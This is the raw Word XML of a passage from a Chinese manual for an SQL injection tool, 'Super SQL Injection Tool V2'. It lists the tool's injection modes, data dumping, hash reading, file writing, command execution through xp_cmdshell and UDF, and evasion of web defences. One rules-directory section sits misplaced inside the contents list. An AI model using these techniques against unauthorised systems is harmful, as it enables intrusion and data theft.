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B1625A">
      <w:pPr>
        <w:spacing w:before="1200" w:after="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:color w:val="1F3B63"/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>超级SQL注入工具 V2 · 使用手册</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59327232">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>版本：V2.0.0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>适用形态：图形界面（SuperSQLInjectionV2.Desktop）/ 命令行（SuperSQLInjectionV2.Cmd）/ DNSLog 接收服务（SuperSQLInjectionV2.DnsServer）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1F2DDE">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="4" w:color="1F3B63"/>
        </w:pBdr>
        <w:ind w:left="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555F6E"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="555F6E"/>
        </w:rPr>
        <w:t>免责声明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="555F6E"/>
        </w:rPr>
        <w:t>：本工具仅限授权范围内的安全测试与学习研究使用，请勿用于非法用途。使用本工具产生的一切后果由使用者自行承担。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2A2422">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63874AB0">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 1 章 软件简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36740CAA">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 2 章 安装与运行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7189051E">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 3 章 快速上手（五分钟跑通一次注入）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622A86FE">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 4 章 注入检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E8944E">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 5 章 注入记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6B5BB4">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 6 章 数据管理（取数与利用）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757FA2A8">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 7 章 网络设置</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC2AC3E">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 8 章 防护绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>8.1 规则库目录（config/rules/，规则与状态分离）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">界面状态与基础配置存 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>config/lastconfig.json</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">；五类规则独立存 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>config/rules/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>，GUI 与 CLI 启动时自动加载、退出时回写，可用任意编辑器直接维护：</w:t>
      </w:r>
    </w:p>
    <w:p>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config/rules/</w:t>
      </w:r>
    </w:p>
    <w:p>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t xml:space="preserve"> ├─ tampers/            编码工具链（内置/自定义分两个文件持久化）</w:t>
      </w:r>
    </w:p>
    <w:p>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t xml:space="preserve"> │   ├─ builtin.json    内置编码工具链（启停/参数/Order 顺序）</w:t>
      </w:r>
    </w:p>
    <w:p>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t xml:space="preserve"> │   ├─ custom.json     自定义脚本链（脚本文件名/启停/Order 顺序）</w:t>
      </w:r>
    </w:p>
    <w:p>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t xml:space="preserve"> │   └─ 签名脚本.js     一脚本一文件（前置 //@ 元数据头 + JS 代码正文）</w:t>
      </w:r>
    </w:p>
    <w:p>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 xml:space="preserve"> ├─ token-scripts/      动态值脚本（同构：chain.json + *.js）</w:t>
      </w:r>
    </w:p>
    <w:p>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 xml:space="preserve"> ├─ dynamic-rules.json  动态规则（DRule / 二次注入）</w:t>
      </w:r>
    </w:p>
    <w:p>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 xml:space="preserve"> ├─ replace-rules.json  字符替换规则</w:t>
      </w:r>
    </w:p>
    <w:p>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 xml:space="preserve"> └─ proxies.json        代理池</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>默认数据生成：启动加载时若磁盘无内置规则数据（全新安装、builtin.json 被删或被清空、旧版空链迁移），自动按内置注册表生成全量默认项（39 个，默认停用、固定 Payload 级）并落盘——编码处理页打开即是完整策略清单，按需勾选启用；磁盘已有数据则原样加载（启停/顺序保留）。内置规则不可修改/删除（操作列按钮禁用），不想用某项请关闭其开关。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>添加自定义 tamper：往 tampers/ 目录丢一个 .js 文件即自动发现入链（无需改 JSON）；内置项启停集中在 builtin.json，自定义链集中在 custom.json，两个文件的 Order 字段共同维护混排执行顺序；删除规则删除对应文件即可。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>脚本元数据头</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">：文件头部用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>//@key: value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 行声明属性，正文为无转义的 JS 代码：</w:t>
      </w:r>
    </w:p>
    <w:p>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//@name: 签名脚本</w:t>
      </w:r>
    </w:p>
    <w:p>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//@enable: true</w:t>
      </w:r>
    </w:p>
    <w:p>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//@scope: payload</w:t>
      </w:r>
    </w:p>
    <w:p>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function tamper(payload) { return payload + '&amp;sign=1'; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>动态值脚本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">：用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>//@kind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 区分类型（0=请求抓取，1=自主生成）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CLI 共用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t>：命令行默认加载同一目录，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--rules-dir=DIR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 可指定其他规则库；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>--tamper</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 同时识别内置工具名与自定义脚本名。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792B9FAE">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 9 章 工具页（取数模版 / 编码工具 / 请求日志）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECD1332">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 10 章 命令行 SuperSQLInjectionV2.Cmd 完整参考</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1538EE">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 11 章 DNS 外带与 DnsServer 部署</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42015744">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 12 章 软件更新与问题反馈</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B225A">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 13 章 AI 智能体集成（supersqlinjectionv2-cmd skill）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BFA436">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 14 章 常见问题 FAQ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47622E94">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>第 1 章 软件简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="335154FA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>1.1 定位</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED1BE4">
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>超级SQL注入工具V2 是一款</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>图形化 SQL 注入测试工具</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">，基于 Avalonia 跨平台运行（Windows / macOS / Linux），是 SuperSQLInjection V1（Windows 专用）的跨平台升级版本。配套命令行版本 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>SuperSQLInjectionV2.Cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>（Native AOT 单文件，无需 .NET 运行时）支持脚本化、批量化的注入检测与数据利用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5A6570">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>1.2 核心能力</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1392"/>
        <w:gridCol w:w="8353"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="706839B6">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>能力域</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="5979E3A2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
          </w:tcPr>
          <w:p w14:paraId="501EE450">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>注入检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
          </w:tcPr>
          <w:p w14:paraId="7D88F740">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Bool 盲注 / 报错注入 / Union 注入 / 时间盲注 / 堆叠注入 / DNS 外带；Level 1–5 与 Risk 1–3 分级用例；网页相似度抗噪、智能模式、穷举模式</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="1926379A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>数据获取</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="49B1146C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>环境变量、库 / 表 / 列结构枚举、行数据 dump（分片 / 断点续传 / 中文识别）、自定义 SQL、Hash 读取、权限角色</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
          </w:tcPr>
          <w:p w14:paraId="7F41F470">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>文件与命令</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
          </w:tcPr>
          <w:p w14:paraId="70193264">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>各数据库读文件 / 写文件（含 MySQL UDF 写库）、命令执行（MySQL UDF sys_eval、SQLServer xp_cmdshell、PostgreSQL UDF 等多通道）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="6E7E151C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>防护绕过</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="57BBB53A">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>内置编码工具链 + 自定义 JS（QuickJS）tamper 脚本、字符替换（支持正则 / 编码前处理）、Chunked 分块、HPP 参数污染、随机 UA / UA 池、代理池轮换、固定延时 / 限速</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
          </w:tcPr>
          <w:p w14:paraId="3A3F4DD2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>智能加速</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
          </w:tcPr>
          <w:p w14:paraId="6FC74670">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>在线学习 / 值预测、n-gram 字符预测、值缓存，盲注取数速度显著提升</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1392"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="4D5B9B50">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>支持数据库</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8352"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="48F53258">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MySQL、SQLServer、PostgreSQL、SQLite、Oracle、Access、DB2、Informix、达梦、人大金仓、openGauss、ClickHouse、H2、HSQLDB（取数语句为独立模板，可扩展）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="36F1CBAA">
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B21C4E4">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
        </w:rPr>
        <w:t>1.3 运行形态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:left w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:bottom w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:right w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideH w:val="single" w:sz="4" w:color="B8C2D1"/>
          <w:insideV w:val="single" w:sz="4" w:color="B8C2D1"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="40" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="40" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2569"/>
        <w:gridCol w:w="2391"/>
        <w:gridCol w:w="4785"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2569"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="38B3D8F2">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2391"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="7C9CC556">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>形态</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4784"/>
            <w:shd w:val="clear" w:fill="1F3B63"/>
          </w:tcPr>
          <w:p w14:paraId="3D29A020">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>用途</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2569"/>
          </w:tcPr>
          <w:p w14:paraId="4E9DC9C0">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SuperSQLInjectionV2.Desktop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2391"/>
          </w:tcPr>
          <w:p w14:paraId="7300201C">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Avalonia 桌面 GUI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4784"/>
          </w:tcPr>
          <w:p w14:paraId="6CCC4D74">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>交互式检测、取数、利用，全部功能入口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2569"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
          <w:p w14:paraId="11D58A1E">
            <w:pPr>
              <w:spacing w:after="0" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>SuperSQLInjectionV2.Cmd</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2391"/>
            <w:shd w:val="clear" w:fill="F0F4FA"/>
          </w:tcPr>
